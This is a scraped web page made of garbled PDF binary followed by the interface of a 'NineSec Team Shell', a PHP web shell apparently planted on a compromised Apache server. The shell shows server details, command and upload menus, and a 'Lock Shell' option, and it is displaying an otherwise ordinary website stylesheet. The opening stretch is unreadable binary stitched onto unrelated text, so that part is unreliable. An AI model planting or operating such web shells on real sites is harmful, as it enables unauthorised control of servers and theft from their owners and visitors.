%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.69.7.117
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0775) :  /var/www/html/assets/website/css/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /var/www/html/assets/website/css/style.css
@import url(../fonts/gilroy/fonts.css);
@import url(../fonts/maison-neue/fonts.css);
:root {
  --font-maison: "maison neue", sans-serif;
  --font-gilroy: "gilroy", sans-serif;
  --color-primary: #666972;
  --color-dark: #232431;
  --color-green: #168b39;
  --color-green_lighten_1: #6de992;
  --color-green_lighten_2: #c2eed6;
  --color-green_darken_1: #11692c;
  --color-green_darken_2: #0d3a23;
  --color-yellow: #ffbb00;
  --color-yellow_darken_1: #644e10;
  --color-blue: #0da6ff;
  --color-blue_darken_1: #0d5e8d;
  --color-blue_darken_2: #0d2a3b;
  --color-white: #fff;
  --color-grey: #a6abbb;
  --color-grey_lighten_1: #dfe2ee;
  --color-grey_lighten_2: #f0f2f8;
  --color-grey_darken_1: #9499aa;
  --easing: cubic-bezier(.2,.4,.1,1);
  --elastic: cubic-bezier(.175,.885,.32,1.5);
}

* {
  outline: none;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

::selection {
  background-color: var(--color-green_lighten_2);
  color: var(--color-dark);
}

::-moz-selection {
  background: var(--color-green_lighten_2);
  color: var(--color-dark);
}

body {
  font-family: var(--font-maison);
  font-size: 14px;
  color: var(--color-primary);
  line-height: 1.714;
  font-weight: normal;
  overflow-x: hidden;
}

.content-wrap {
  padding: 7em 0;
}

.container {
  width: calc(100% - 60px);
  max-width: 1200px;
  padding: 0;
  margin: 0 auto;
}

.container-fluid {
  width: calc(100% - 12em);
  padding: 0;
}

.row {
  margin: 0 -15px;
}
.row [class^=col-] {
  padding: 0 15px;
}

b,
strong {
  font-weight: 600;
  color: var(--color-dark);
}

a {
  color: var(--color-green);
  transition: color 0.3s var(--easing);
}
a:hover, a:focus, a:focus:active {
  text-decoration: none;
  color: var(--color-green_darken_1);
}

p {
  margin: 0 0 15px;
}

.link {
  display: inline-block;
  color: var(--color-primary);
  font-weight: 600;
  background-image: linear-gradient(to top, var(--color-green) 0%, var(--color-green) 100%);
  background-size: 0 2px;
  background-position: 0 100%;
  background-repeat: no-repeat;
  transition: background-size 0.3s var(--easing), color 0.3s var(--easing);
}
.link:hover, .link:focus, .link:focus:active {
  color: var(--color-red);
  background-size: 100% 2px;
}

.hover-line {
  background-image: linear-gradient(to top, var(--color-red) 0%, var(--color-red) 100%);
  background-size: 0 2px;
  background-position: 0 100%;
  background-repeat: no-repeat;
  transition: background-size 0.3s var(--easing);
}
.hover-line:hover, .hover-line:focus, .hover-line:focus:active {
  background-size: 100% 2px;
}

.link-icon {
  padding: 0;
  background-color: transparent;
  border: none;
  color: var(--color-primary);
  font-weight: 500;
  display: inline-flex;
  align-items: center;
  transition: color 0.3s var(--easing);
}
.link-icon span {
  position: relative;
  transform: translateZ(0);
  width: 40px;
  height: 40px;
  display: flex;
  align-items: center;
  justify-content: center;
  color: var(--color-dark);
  margin-left: 15px;
}
.link-icon span:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-radius: 50%;
  background-color: var(--color-yellow);
  z-index: -1;
  transition: transform 0.3s var(--elastic);
}
.link-icon span i {
  font-size: 14px;
  font-weight: normal;
}
.link-icon:hover, .link-icon:focus, .link-icon:focus:active {
  color: var(--color-dark);
}
.link-icon:hover span:before, .link-icon:focus span:before, .link-icon:focus:active span:before {
  transform: scale(1.2);
}
.link-icon:hover i, .link-icon:focus i, .link-icon:focus:active i {
  animation: linkIcon 0.3s var(--easing);
}

@keyframes linkIcon {
  0%, 100% {
    transform: translateX(0);
  }
  50% {
    transform: translateX(100%);
    opacity: 0;
  }
  51% {
    transform: translateX(-100%);
    opacity: 0;
  }
}
.subtitle {
  font-size: 12px;
  font-weight: 600;
  text-transform: uppercase;
  letter-spacing: 0.03em;
}

.main-title {
  margin-bottom: 4em;
}
.main-title:after {
  content: "";
  display: block;
  width: 40px;
  height: 2px;
  background-color: var(--color-green);
  margin: 20px 0 0;
}
.main-title.text-center:after {
  margin-left: auto;
  margin-right: auto;
}
.main-title .subtitle {
  margin-bottom: 15px;
}
.main-title .title {
  font-family: var(--font-gilroy);
  margin: 0;
  font-weight: 800;
  letter-spacing: -0.015em;
  line-height: 1.1;
}

h1, h2, h3, h4, h5 {
  margin: 20px 0;
  color: var(--color-dark);
  font-weight: 600;
  line-height: 1.4;
}

h1 {
  font-size: 48px;
}

h2 {
  font-size: 40px;
}

h3 {
  font-size: 32px;
}

h4 {
  font-size: 24px;
}

h5 {
  font-size: 18px;
}

.box-img {
  position: relative;
  overflow: hidden;
}
.box-img:after {
  content: "";
  display: block;
  padding-top: 100%;
}
.box-img:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: var(--color-green);
  mix-blend-mode: multiply;
  z-index: 2;
  opacity: 0.1;
}
.box-img.video-wrap {
  border-radius: 12px;
}
.box-img.video-wrap:after {
  padding-top: 56.25%;
}

.thumb {
  position: absolute;
  transform: translateZ(0);
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  overflow: hidden;
}
.thumb img {
  display: block;
  width: 100%;
  height: 100%;
  object-fit: cover;
}

.btn {
  position: relative;
  transform: translateZ(0);
  border: none;
  border-radius: 30px;
  line-height: 0;
  padding: 21px 25px 19px;
  background-color: transparent;
  color: var(--color-primary);
  font-size: 12px;
  font-weight: 600;
  letter-spacing: 0.03em;
  text-transform: uppercase;
  transition: color 0.3s var(--easing);
  display: inline-flex;
  align-items: center;
  justify-content: center;
}
.btn:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-radius: 30px;
  background-color: var(--color-grey_lighten_1);
  z-index: -1;
  transition: transform 0.3s var(--elastic);
}
.btn:hover, .btn:focus, .btn:focus:active {
  box-shadow: none;
  color: var(--color-dark);
}
.btn:hover:before, .btn:focus:before, .btn:focus:active:before {
  transform: scale(1.09, 1.15);
}
.btn.btn-warning {
  color: var(--color-dark);
}
.btn.btn-warning:hover, .btn.btn-warning:focus, .btn.btn-warning:focus:active {
  color: var(--color-dark);
}
.btn.btn-warning:before {
  background-color: var(--color-yellow);
}
.btn.btn-danger {
  color: var(--color-white);
}
.btn.btn-danger:hover, .btn.btn-danger:focus, .btn.btn-danger:focus:active {
  color: var(--color-white);
}
.btn.btn-danger:before {
  background-color: var(--color-red);
}
.btn.btn-primary {
  color: var(--color-white);
}
.btn.btn-primary:hover, .btn.btn-primary:focus, .btn.btn-primary:focus:active {
  color: var(--color-white);
}
.btn.btn-primary:before {
  background-color: var(--color-blue);
}
.btn.btn-dark {
  color: var(--color-white);
}
.btn.btn-dark:hover, .btn.btn-dark:focus, .btn.btn-dark:focus:active {
  color: var(--color-white);
}
.btn.btn-dark:before {
  background-color: var(--color-dark);
}
.btn.btn-lg {
  padding: 26px 30px 24px;
  font-size: 14px;
}
.btn .icon {
  line-height: 0;
  vertical-align: middle;
  margin-top: -4px;
  margin-right: 10px;
  font-size: 14px;
  margin-left: -5px;
  transition: font-size 0.3s var(--elastic), margin 0.3s var(--elastic);
}
.btn.btn-icon {
  padding-right: 35px;
  transition: padding 0.3s var(--easing);
}
.btn.btn-icon .icon {
  width: 30px;
  height: 30px;
  line-height: 0;
  display: inline-flex;
  justify-content: center;
  align-items: center;
  position: absolute;
  top: 0;
  right: 0;
  margin: 5px;
  border-radius: 50%;
  font-size: 12px;
  background-color: var(--color-green);
  color: var(--color-white);
  transform: scale(0.2);
  transform-origin: center;
  transition: transform 0.3s var(--easing);
}
.btn.btn-icon .icon:before {
  opacity: 0;
  transition: opacity 0.3s var(--easing);
}
.btn.btn-icon:hover {
  padding-right: 50px;
}
.btn.btn-icon:hover .icon {
  transform: scale(1);
}
.btn.btn-icon:hover .icon:before {
  opacity: 1;
  transition-delay: 0.2s;
}
.btn.btn-lg {
  padding: 26px 30px 24px;
  font-size: 12px;
  font-weight: 600;
  letter-spacing: 0.03em;
  text-transform: uppercase;
}
.btn.btn-lg.btn-icon {
  padding-right: 45px;
}
.btn.btn-lg.btn-icon .icon {
  width: 30px;
  height: 30px;
  margin: 10px;
}
.btn.btn-lg.btn-icon:hover {
  padding-right: 55px;
}

.btn-circle {
  padding: 0;
  width: 40px;
  height: 40px;
  display: inline-flex;
  align-items: center;
  justify-content: center;
  border-radius: 50%;
}
.btn-circle:hover:before, .btn-circle:focus:before, .btn-circle:focus:active:before {
  transform: scale(1.2);
}
.btn-circle i {
  font-size: 14px;
  line-height: 1;
}

.caption-btn {
  margin-top: 4em;
}

.form-group {
  position: relative;
  margin: 0 0 30px;
}

.form-control {
  font-size: 14px;
  color: var(--color-dark);
  height: auto;
  padding: 29px 0 16px;
  border-radius: 0;
  line-height: 1;
  border-width: 0 0 1px;
  border-color: var(--color-grey_lighten_1);
  box-shadow: none;
  background-color: transparent;
}
.form-control:focus {
  box-shadow: none;
  border-color: var(--color-green);
}
.form-control + .form-label {
  position: absolute;
  font-size: 14px;
  top: 29px;
  line-height: 1;
}
.form-control:focus + .form-label, .form-control:valid + .form-label {
  top: 0;
  font-size: 12px;
}

[type=password] {
  letter-spacing: 0.3em;
}

select.form-control {
  -moz-appearance: none;
  -webkit-appearance: none;
  background-image: url(../images/ic_menu_down.svg) !important;
  background-size: 24px;
  padding-right: 40px;
  background-repeat: no-repeat;
  background-position: right top 23px;
}
select.form-control option {
  font-size: 13px;
}

.form-label {
  font-size: 13px;
  font-weight: normal;
  color: var(--color-grey);
  transition: font 0.3s var(--easing), top 0.3s var(--easing);
}

.swiper-wrapper {
  transition-timing-function: var(--easing) !important;
}

.swiper-container-horizontal > .swiper-pagination-bullets,
.swiper-pagination-custom,
.swiper-pagination-fraction {
  bottom: 0;
  padding: 30px 0;
}

.swiper-pagination-bullet {
  width: 12px;
  height: 12px;
  background-color: var(--color-dark);
  opacity: 1;
}

.swiper-pagination-bullet-active {
  background-color: transparent;
  border: 2px solid var(--color-dark);
  transform: scale(1.4);
}

.swiper-container-horizontal > .swiper-pagination-bullets .swiper-pagination-bullet {
  margin: 10px;
}

.swiper-nav-wrapper .container {
  display: flex;
  align-items: center;
}
.swiper-nav-wrapper .swiper-pagination {
  position: static;
  text-align: left;
  margin-right: auto;
}
.swiper-nav-wrapper .swiper-pagination .swiper-pagination-bullet + .swiper-pagination-bullet {
  margin-left: 20px;
}

.swiper-button-wrapper > div {
  display: inline-flex;
  position: relative;
  left: auto;
  right: auto;
}
.swiper-button-wrapper > div + div {
  margin-left: 10px;
}

.swiper-button-prev,
.swiper-button-next {
  transform: translateZ(0);
  background-image: none;
  width: 40px;
  height: 40px;
  font-size: 14px;
  display: flex;
  align-items: center;
  justify-content: center;
  color: var(--color-dark);
  margin: 0;
  opacity: 1 !important;
}
.swiper-button-prev:before,
.swiper-button-next:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-radius: 50%;
  background-color: var(--color-grey_lighten_1);
  z-index: -1;
  transition: transform 0.3s var(--elastic);
}
.swiper-button-prev:hover:before,
.swiper-button-next:hover:before {
  transform: scale(1.2);
}
.swiper-button-prev i,
.swiper-button-next i {
  font-size: 14px;
}

.swiper-button-prev:hover i {
  animation: animPrev 0.3s var(--easing) forwards;
}

.swiper-button-next:hover i {
  animation: animNext 0.3s var(--easing) forwards;
}

@keyframes animPrev {
  0%, 100% {
    transform: translateX(0);
    opacity: 1;
  }
  50% {
    transform: translateX(-100%);
  }
  51% {
    transform: translateX(-100%);
    opacity: 0;
  }
  52% {
    transform: translateX(100%);
    opacity: 0;
  }
}
@keyframes animNext {
  0%, 100% {
    transform: translateX(0);
    opacity: 1;
  }
  50% {
    transform: translateX(100%);
  }
  51% {
    transform: translateX(100%);
    opacity: 0;
  }
  52% {
    transform: translateX(-100%);
    opacity: 0;
  }
}
.mega-menu {
  position: absolute;
  top: 100%;
  left: 50%;
  transform: translateX(-50%);
  width: 100%;
  background-color: var(--color-red);
  clip-path: polygon(0 0, 100% 0, 100% 0%, 0 0%);
  transition: width 0.3s var(--easing), clip-path 0.3s var(--easing);
  transition-delay: 0S;
}
.mega-menu .container {
  width: 100%;
}
.mega-menu ul {
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: center;
  align-items: center;
  opacity: 0;
  transform: translateY(30px);
  transition: opacity 0.3s var(--easing), transform 0.3s var(--easing);
  transition-delay: 0s;
}
.mega-menu ul > li > a {
  line-height: 60px;
  display: block;
  color: var(--color-light_red);
  font-weight: 700;
  font-size: 12px;
  text-transform: uppercase;
  letter-spacing: 0.03em;
  padding: 0 20px;
}
.mega-menu ul > li > a:hover, .mega-menu ul > li > a:focus, .mega-menu ul > li > a:focus:active {
  color: var(--color-white);
}

.sticky .mega-menu {
  transition-delay: 0.15s;
}
.sticky .mega-menu .container {
  max-width: 1200px;
}

.tab-wrapper .nav-tabs {
  display: inline-flex;
}

.nav-tabs {
  padding: 10px;
  border-radius: 50px;
  background-color: var(--color-green);
  border: none;
  margin: 0;
  display: flex;
  white-space: nowrap;
}
.nav-tabs > li {
  float: none;
  margin-bottom: 0;
}
.nav-tabs > li > a {
  position: relative;
  transform: translateZ(0);
  border: none;
  border-radius: 0;
  padding: 21px 25px 19px;
  line-height: 0;
  background-color: transparent;
  margin-right: 0;
  color: var(--color-green_lighten_1);
  font-size: 12px;
  font-weight: 700;
  letter-spacing: 0.03em;
  text-transform: uppercase;
}
.nav-tabs > li > a:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-radius: 30px;
  background-color: var(--color-white);
  z-index: -1;
  transform: scale(0.85);
  opacity: 0;
  transition: transform 0.3s var(--elastic), opacity 0.3s var(--easing);
}
.nav-tabs > li > a:hover, .nav-tabs > li > a:focus, .nav-tabs > li > a:focus:active {
  background-color: transparent;
  color: var(--color-white);
}
.nav-tabs > li.active a,
.nav-tabs > li.active a:hover,
.nav-tabs > li.active a:focus,
.nav-tabs > li.active a:focus:active {
  background-color: transparent;
  border: none;
  color: var(--color-dark);
}
.nav-tabs > li.active a::before,
.nav-tabs > li.active a:hover::before,
.nav-tabs > li.active a:focus::before,
.nav-tabs > li.active a:focus:active::before {
  transform: scale(1);
  opacity: 1;
}

.label {
  margin: 0 8px 10px 0;
  display: inline-block;
  line-height: 0;
  font-size: 12px;
  font-weight: 700;
  letter-spacing: 0.02em;
  text-transform: uppercase;
  color: var(--color-dark);
  border: 1px solid transparent;
  padding: 15px 16px 13px;
  border-radius: 30px;
  background-color: var(--color-light_grey);
}
.label.label-bordered {
  background-color: transparent;
  border-color: var(--color-light_grey);
}
.label.label-bordered.label-danger {
  border-color: var(--color-red);
  color: var(--color-red);
}

.text-label {
  font-size: 12px;
  font-weight: 700;
  letter-spacing: 0.03em;
  text-transform: uppercase;
  color: var(--color-grey);
}

.text-sm {
  font-size: 13px;
}

.text-danger {
  color: var(--color-red);
}

.text-success {
  color: var(--color-green);
}

.text-warning {
  color: var(--color-yellow);
}

.row-title {
  margin-bottom: 4em;
}
.row-title .main-title,
.row-title .caption-btn {
  margin: 0;
}

.flex-base {
  display: flex;
  align-items: baseline;
}

.flex-mid {
  display: flex;
  align-items: center;
}

.flex-end {
  display: flex;
  align-items: flex-end;
}

.ali-right {
  margin-left: auto;
}

.social-icon {
  margin: 0;
  padding: 0;
  list-style: none;
}
.social-icon li {
  display: inline-block;
}
.social-icon li + li {
  margin-left: 5px;
}
.social-icon a {
  position: relative;
  transform: translateZ(0);
  display: flex;
  justify-content: center;
  align-items: center;
  width: 40px;
  height: 40px;
  color: var(--color-white);
}
.social-icon a:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-radius: 30px;
  background-color: var(--color-green);
  z-index: -1;
  transition: transform 0.3s var(--elastic);
}
.social-icon a:hover:before, .social-icon a:focus:before, .social-icon a:focus:active:before {
  transform: scale(1.2);
}

.breadcrumb {
  margin: 0 0 15px;
  padding: 0;
  background-color: transparent;
}
.breadcrumb li {
  color: var(--color-white);
  font-size: 12px;
  font-weight: 700;
  text-transform: uppercase;
  letter-spacing: 0.03em;
}
.breadcrumb li + li:before {
  content: "--";
  padding: 0 7px 0 5px;
}
.breadcrumb li a {
  color: var(--color-yellow);
}
.breadcrumb li a:hover, .breadcrumb li a:focus, .breadcrumb li a:focus:active {
  color: var(--color-yellow);
}

.pagination-nav {
  display: flex;
  align-items: center;
  justify-content: space-between;
  max-width: 768px;
  margin: 3em auto 0;
}
.pagination-nav .disabled {
  opacity: 0;
}
.pagination-nav .prev:hover i {
  animation: animPrev 0.3s var(--easing) forwards;
}
.pagination-nav .next:hover i {
  animation: animNext 0.3s var(--easing) forwards;
}
.pagination-nav .pagination {
  display: flex;
  margin: 0;
  border-radius: 0;
}
.pagination-nav .pagination li {
  display: inherit;
  margin: 0 5px;
}
.pagination-nav .pagination li a {
  float: none;
  display: block;
  padding: 0;
  width: 40px;
  padding: 21px 0 19px;
  line-height: 0;
  border: none;
  color: var(--color-grey);
  font-weight: 600;
  border-radius: 50%;
  text-align: center;
}
.pagination-nav .pagination li a:hover, .pagination-nav .pagination li a:focus, .pagination-nav .pagination li a:focus:active {
  background-color: transparent;
  color: var(--color-dark);
}
.pagination-nav .pagination li.active a,
.pagination-nav .pagination li.active a:hover,
.pagination-nav .pagination li.active a:focus,
.pagination-nav .pagination li.active a:focus:active {
  background-color: var(--color-green);
  color: var(--color-white);
}

.text-danger {
  color: var(--color-red);
}

.panel {
  display: block;
  position: relative;
  background-color: var(--color-white);
  box-shadow: 0 0 50px rgba(13, 42, 59, 0.06);
  margin-bottom: 30px;
  border-radius: 12px;
}
.panel .panel-heading {
  padding: 25px 30px 0;
  display: flex;
}
.panel .panel-heading .main-title {
  margin: 0 auto 0 0;
  padding-right: 30px;
}
.panel .panel-heading .main-title .title {
  font-weight: 700;
  line-height: 1.3;
}
.panel .panel-body {
  display: block;
  padding: 25px 30px;
}
.panel .single-post .single-img,
.panel .single-post .single-media {
  margin-left: 0;
  margin-right: 0;
}

.panel-link .panel-body {
  display: flex;
  flex-direction: column;
  min-height: 180px;
}
.panel-link .icon {
  font-size: 24px;
}
.panel-link .title {
  margin: auto 0 0;
}

.table .link {
  color: var(--color-red);
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: none;
  padding: 0 30px 20px;
  color: var(--color-red);
  font-size: 12px;
  font-weight: 700;
  text-transform: uppercase;
  letter-spacing: 0.03em;
}
.table > tbody > tr > td {
  padding: 20px 30px;
  line-height: inherit;
  vertical-align: top;
  border-top: none;
}
.table > tbody > tr:nth-of-type(odd) {
  background-color: var(--color-light_grey_3);
}

.list {
  margin: 0;
}
.list li + li {
  margin-top: 12px;
}

.control-group + .control-group {
  margin-top: 3em;
  padding-top: 3em;
  border-top: 1px solid var(--color-light_grey);
}

.dropdown {
  position: relative;
}
.dropdown:hover .dropdown-hover {
  clip-path: polygon(0 0, 100% 0, 100% 100%, 0 100%);
}
.dropdown:hover .dropdown-hover ul li {
  transform: translateY(0);
  opacity: 1;
  transition-delay: 0.2s;
}
.dropdown:hover .dropdown-hover ul li:nth-child(2) {
  transition-delay: 0.25s;
}
.dropdown:hover .dropdown-hover ul li:nth-child(3) {
  transition-delay: 0.3s;
}
.dropdown:hover .dropdown-hover ul li:nth-child(4) {
  transition-delay: 0.35s;
}
.dropdown:hover .dropdown-hover ul li:nth-child(5) {
  transition-delay: 0.4s;
}
.dropdown:hover .dropdown-hover ul li:nth-child(5) {
  transition-delay: 0.45s;
}
.dropdown:hover .dropdown-hover ul li:nth-child(6) {
  transition-delay: 0.5s;
}
.dropdown.open .dropdown-menu {
  clip-path: polygon(0 0, 100% 0, 100% 100%, 0 100%);
}
.dropdown.open .dropdown-menu ul li {
  transform: translateY(0);
  opacity: 1;
  transition-delay: 0.2s;
}
.dropdown.open .dropdown-menu ul li:nth-child(2) {
  transition-delay: 0.25s;
}
.dropdown.open .dropdown-menu ul li:nth-child(3) {
  transition-delay: 0.3s;
}
.dropdown.open .dropdown-menu ul li:nth-child(4) {
  transition-delay: 0.35s;
}
.dropdown.open .dropdown-menu ul li:nth-child(5) {
  transition-delay: 0.4s;
}
.dropdown.open .dropdown-menu ul li:nth-child(5) {
  transition-delay: 0.45s;
}
.dropdown.open .dropdown-menu ul li:nth-child(6) {
  transition-delay: 0.5s;
}

.dropdown-hover {
  position: absolute;
  top: 100%;
  left: 50%;
  transform: translateX(-50%);
  white-space: nowrap;
  z-index: 4;
  min-width: 200px;
  clip-path: polygon(0 0, 100% 0, 100% 0%, 0 0%);
  transition: clip-path 0.3s var(--easing);
}
.dropdown-hover ul {
  padding: 30px 40px;
  margin: 10px 0 0;
  list-style: none;
  border-radius: 12px;
  background-color: var(--color-yellow);
  transition: height 0.3s var(--easing);
}
.dropdown-hover ul li {
  opacity: 0;
  transform: translateY(10px);
  transition: opacity 0.3s var(--easing), transform 0.3s var(--easing);
}
.dropdown-hover ul li + li {
  margin-top: 10px;
  padding-top: 10px;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
}
.dropdown-hover ul li a {
  display: inline-block;
  color: var(--color-dark);
  transition: color 0.3s var(--easing), transform 0.3s var(--easing);
}
.dropdown-hover ul li a:hover, .dropdown-hover ul li a:focus, .dropdown-hover ul li a:focus:active {
  color: var(--color-dark);
  transform: translateX(6px);
}

.dropdown-menu {
  display: block;
  padding: 0;
  background-color: transparent;
  border: none;
  position: absolute;
  top: 100%;
  left: 50%;
  transform: translateX(-50%);
  white-space: nowrap;
  z-index: 4;
  min-width: 200px;
  clip-path: polygon(0 0, 100% 0, 100% 0%, 0 0%);
  transition: clip-path 0.3s var(--easing);
}
.dropdown-menu ul {
  padding: 30px 40px;
  margin: 10px 0 0;
  list-style: none;
  border-radius: 12px;
  background-color: var(--color-yellow);
  transition: height 0.3s var(--easing);
}
.dropdown-menu ul li {
  display: block;
  opacity: 0;
  transform: translateY(10px);
  transition: opacity 0.3s var(--easing), transform 0.3s var(--easing);
}
.dropdown-menu ul li + li {
  margin-top: 10px;
  padding-top: 10px;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
}
.dropdown-menu ul li a {
  display: inline-block;
  color: var(--color-dark);
  transition: color 0.3s var(--easing), transform 0.3s var(--easing);
}
.dropdown-menu ul li a:hover, .dropdown-menu ul li a:focus, .dropdown-menu ul li a:focus:active {
  color: var(--color-dark);
  transform: translateX(6px);
}

.hover-effect {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-radius: 12px;
  display: flex;
  align-items: center;
  justify-content: center;
  background-color: rgba(13, 42, 59, 0.6);
  opacity: 0;
  transition: opacity 0.3s var(--easing);
}
.hover-effect i {
  color: var(--color-white);
  font-size: 24px;
}
.hover-effect span {
  color: var(--color-white);
  font-family: var(--font-gilroy);
  font-weight: 700;
  font-size: 24px;
}
:hover > .hover-effect {
  opacity: 1;
}

.collapsing {
  transition-duration: 0.3s;
  transition-timing-function: var(--easing);
}

/*==========*/
.modal-open,
.modal {
  padding-right: 0 !important;
}

.modal-backdrop.in {
  opacity: 0.5;
}

.modal {
  overflow: auto;
}
.modal .modal-dialog {
  display: table;
  width: 100%;
  height: 100%;
  margin: 0;
  padding: 0;
  transform: none !important;
  opacity: 1;
}
.modal .modal-content {
  display: table-cell;
  vertical-align: middle;
  margin: 0;
  padding: 0;
  box-shadow: none;
  border-radius: 0;
  border: none;
  background-color: transparent;
  position: relative;
}
.modal .backdrop {
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
}
.modal .panel {
  margin: 40px 0;
  position: relative;
  border-radius: 20px;
  z-index: 2;
}
.modal .panel .panel-heading {
  padding: 35px 40px 0;
}
.modal .panel .panel-body {
  padding: 35px 40px;
}
.modal .close {
  position: absolute;
  top: -15px;
  right: -15px;
  width: 40px;
  height: 40px;
  display: flex;
  align-items: center;
  justify-content: center;
  margin-left: auto;
  text-align: center;
  color: var(--color-dark);
  opacity: 1;
  text-shadow: none;
  border-radius: 50%;
  background-color: var(--color-white);
  box-shadow: 0 0 20px rgba(13, 42, 59, 0.3);
  transition: color 0.3s var(--easing), border-color 0.3s var(--easing), background-color 0.3s var(--easing);
}
.modal .close:hover, .modal .close:focus, .modal .close:focus:active {
  opacity: 1;
  color: var(--color-white);
  border-color: transparent;
  background-color: var(--color-dark);
}
.modal .close i {
  font-size: 16px;
  line-height: 1;
}
.modal .fix-close {
  position: fixed;
  top: 0;
  right: 0;
  z-index: 40;
  width: 50px;
  line-height: 48px;
  height: 50px;
  border-radius: 0 0 0 4em;
  border: none;
  background-color: var(--color-dark);
  color: var(--color-white);
}
.modal .fix-close i {
  display: inline-block;
  font-size: 18px;
  margin-top: -12px;
  margin-left: 10px;
}
.modal .fade {
  transition: opacity 0.3s var(--easing);
}

/*# sourceMappingURL=style.css.map */

NineSec Team - 2022